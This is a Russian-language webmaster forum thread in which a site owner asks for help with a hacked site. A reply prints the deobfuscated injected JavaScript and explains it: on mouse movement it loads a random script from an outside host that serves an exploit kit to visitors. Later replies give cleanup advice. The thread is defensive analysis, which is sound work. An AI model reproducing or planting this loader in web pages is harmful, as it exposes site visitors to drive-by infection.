Z
С нами с 15.05.05
Сообщения: 55244
Рейтинг: 7770
 
|
 Добавлено: 19/06/12 в 13:30 |
вообще походу поломали
и с файлы добавили код
removed by moderator
кто может расшифровать, что там к чему и точно ли это код вирусняка, касперыч говорит что это Trojan-Downloader.JS.Agent.gry
Спасибо
|
|
|
|
| |
С нами с 19.07.03
Сообщения: 66
Рейтинг: 80
|
| Добавлено: 19/06/12 в 14:03 |
чего ж подозрения, поломали тебя
| Код: [развернуть] | (function() {
var url = 'http://kwksnyiqkd.blogdns.com/g/';
if (typeof window.xyzflag === 'undefined') {
window.xyzflag = 0;
}
document.onmousemove = function() {
if (window.xyzflag === 0) {
window.xyzflag = 1;
var head = document.getElementsByTagName('head')[0];
var script = document.createElement('script');
script.type = 'text/javascript';
script.onreadystatechange = function () {
if (this.readyState == 'complete') {
window.xyzflag = 2;
}
};
script.onload = function() {
window.xyzflag = 2;
};
script.src = url + Math.random().toString().substring(3) + '.js';
head.appendChild(script);
}
};
})(); |
принцип действия такой:
расшифрованный вверху код устанавливет обработчик на перемещение мышки,
обработчик соответственно добавляет в секцию head еще один блок <script>
и прописывает в нем адрес скрипта
kwksnyiqkd.blogdns.com/g/рандомная_куета.js, что есть связкой сплойтов для твоих посетителей. На одной страничке такой код исполнится только 1 раз.
|
|
|
|
| |
Z
С нами с 15.05.05
Сообщения: 55244
Рейтинг: 7770
|
| Добавлено: 19/06/12 в 14:08 |
Nuv: сенкс и я так понимаю удалив тот код будет все пучком ?
|
|
|
|
| |
С нами с 19.07.03
Сообщения: 66
Рейтинг: 80
|
| Добавлено: 19/06/12 в 14:15 |
Ну как сказать пучком, если руками поломали а не автоматом ты код удалишь, а злодей_хряцкер опять пропишет. Так и будете играться. Нужно тебе обновлять CMS, сменить свои пароли везде на всякий случай, ну и другие действия личной гигиены.
|
|
|
|
| |
Z
С нами с 15.05.05
Сообщения: 55244
Рейтинг: 7770
|
| Добавлено: 19/06/12 в 14:24 |
Nuv: да тут не все так, просто, пока есть только данные от FTP
и пока не совсем понятно естьли там СMS или нет
ну пока уберем ручками и права поменяю, посмотрим что из этого получится
|
|
|
|
| |
С нами с 19.05.08
Сообщения: 1894
Рейтинг: 3625
|
| Добавлено: 19/06/12 в 17:00 |
Однозначно надо искать сначала путь проникновения, а затем уже лечить последствия. Что за скрипты стоят на сайте? Сервере? и т д.
|
|
|
|
(!)Внимание Ero Advertising дополнительный Еврики от продажи рекламы. Особенно попандеров и мобилок.
|
1
|
|
| |
С нами с 14.03.12
Сообщения: 596
Рейтинг: -175
|
| Добавлено: 19/06/12 в 19:53 |
| andreich писал: | | посмотрим что из этого получится |
получится может много чего не хорошего.почитай логи в день взлома там все есть.
|
|
|
|
| |
Текстовая реклама в форме ответа
Заголовок и до четырех строчек текста
Длина текста до 350 символов
Купить рекламу в этом месте! |
